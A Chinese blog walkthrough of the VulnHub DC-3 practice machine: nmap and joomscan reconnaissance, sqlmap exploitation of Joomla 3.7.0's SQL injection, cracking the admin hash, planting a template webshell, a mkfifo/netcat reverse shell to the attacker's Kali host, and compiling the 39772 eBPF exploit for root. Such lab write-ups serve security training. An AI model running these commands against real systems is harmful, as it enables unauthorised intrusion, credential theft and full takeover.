首页 > 系统相关 >DC-3-Joomla-Ubuntu提权

DC-3-Joomla-Ubuntu提权

时间:2024-05-04 22:15:06浏览次数:27  
标签:-- list 75.156 DC 192.168 提权 Joomla fields

靶机DC-3下载地址:https://www.vulnhub.com/entry/dc-32,312/
翻译一下官方给出的一些信息:
这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。
靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与Kali在同一个网段下)

一、信息收集

1.主机发现

arp-scan -l

image.png

2.端口扫描

nmap -A -p- 192.168.75.156

image.png
发现目标主机只是打开了80端口,用的是Joomla
同时主页也给我们提示,表明这个靶机只有一个flag
image.png
image.png
image.png

3.脚本扫描

nmap --script=vuln 192.168.75.156

扫描得出CMS版本3.7.0
存在数据库注入漏洞以及漏洞编号
image.png
image.png

4.cms扫描

cms为joomla,对应扫描器为joomscan

joomscan -u 192.168.75.156

扫描出登入界面
image.png

二、漏洞探测

searchsploit joomla 3.7.0

image.png
搜索到joomla 3.7.0的数据库注入漏洞,编号42033

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

找到注入方法
image.png

三、漏洞利用

1.数据库注入攻击

sqlmap -u "http://192.168.75.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

注入查询当前靶机正在使用的数据库为:joomladb
image.png

sqlmap -u "http://192.168.75.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

注入查询joomladb数据库有哪些表,筛选出用户表:#__users
image.png
注入查询#__users表有哪些列,共6列

sqlmap -u "http://192.168.75.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

image.png
image.png
注入查询#__users表的name、password字段,输出信息

sqlmap  -u "http://192.168.75.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

image.png
获得网站后台登录用户名admin和密码hash值

admin  #用户名
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu  #密码hash值

2.密码哈希值解密john

vim 1.txt
创建一个用于放散列密码的文档1.txt

john 1.txt
john解密

john 1.txt --show
得出密文:snoopy

image.png

3.反弹Shell

账号密码登入之前扫描的login网址
http://192.168.75.156/administrator/
image.png
发现可以编辑模板里面的php文件,且这些模板可以从外部访问
image.png
这里编辑Beez3模板
这里我在html目录下创建了一个名为wi11.php的webshell
image.png
接下来用蚁剑连接
http://192.168.75.156/templates/beez3/html/wi11.php
image.png
我们在Kali上使用nc,通过蚁剑反弹一个shell
我们先在Kali上开启监听

Kali:nc -lvnp 2333
蚁剑:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.75.150 2333 >/tmp/f

交互式shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者
python -c 'import pty; pty.spawn("/bin/bash")'

image.png
image.png

4.Ubuntu提权

提权(这里有两个思路:使用辅助脚本、根据linux版本)
首先需要明确,不能使用蚁剑提权,因为HTTP是瞬时协议,我这边正提权呢,你那边TCP四次挥手断开连接了,不能持久连接,所以蚁剑的作用就在于反弹shell、上传文件。

uname -a
lsb_release -a

查看系统信息,发现Ubuntu版本16.04
image.png
使用searchsploit工具查找Ubuntu 16.04的提权漏洞,发现一个"拒绝服务漏洞",可以用来提权

searchsploit ubuntu 16.04

image.png
查看漏洞介绍

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

image.png
下载exp

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

image.png
通过蚁剑上传到靶机
image.png
然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

unzip 39772.zip
cd 39772
tar -xvf exploit.tar

image.png
image.png

cd ebpf_mapfd_doubleput_exploit
./compile.sh   #执行脚本,编译文件
./doubleput  #执行提权文件

image.png
image.png
image.png

标签:--,list,75.156,DC,192.168,提权,Joomla,fields
From: https://www.cnblogs.com/NoCirc1e/p/18172788

相关文章

  • DC-2-WordPress-git提权
    靶机概览详情介绍请参考下载地址任务目标:拿下5个flag下载地址:https://www.vulnhub.com/entry/dc-2,311/信息收集nmap信息收集1:使用nmap确定靶机地址是192.168.75.1552:继续使用nmap对靶机做进一步探测,发现靶机开启了80和7744(SSH)端口,先从80端口打开局面3:访问网站,发现URL......
  • DC-4-teehee提权
    主机信息实验过程详情介绍请参考下载地址任务目标:拿下系统的root账户靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/主机信息DC4:192.168.75.151Kali:192.168.75.150实验过程先发现内网存活主机arp-scan--interfaceeth0192.168.75.1/24然后查看靶机开放的......
  • DC-5-screen提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署vulnhub官网:https://www.vulnhub.com/......
  • DC-7-Drupal-脚本文件提权
    Vulnhub靶机介绍Vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行练习,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。靶机DC7还是只有拿到root权限才可以发现最终的flag。01环境搭建靶机环境下载:https://www.vulnhub.com......
  • DC-6-WordPress-nmap提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署这个挑战的最终目标是获得root权限并......
  • DC-9-sudo提权
    标签:SQL注入、本地文件包含LFI、端口敲门、hydra爆破、linux提权0x00环境准备下载地址:https://www.vulnhub.com/entry/dc-9,412/靶机描述:DC-9isanotherpurposelybuiltvulnerablelabwiththeintentofgainingexperienceintheworldofpenetrationtesting.The......
  • DC-8-Drupal-exim4提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com......
  • WPF datagrid datagridtemplatecolumn DataGridTemplateColumn.CellEditingTemplate D
    //xaml<Windowx:Class="WpfApp89.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • WPF Datagrid DataGridComboBoxColumn ObjectDataProvider ObjectDataProvider.Method
    //xaml<Windowx:Class="WpfApp90.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • springboot+MDCAdapter自定义starter实现日志全链路追踪
    MDCMDC(MappedDiagnosticContext,映射调试上下文)是日志系统提供的一种方便在多线程条件下记录日志的功能使用场景一个常用的场景就是Web服务器中给每个请求都分配一个独特的请求id,所有的日志都会打印这个请求id,这样一个请求下的所有日志信息都可以很方便的找到。欢迎关注个人公......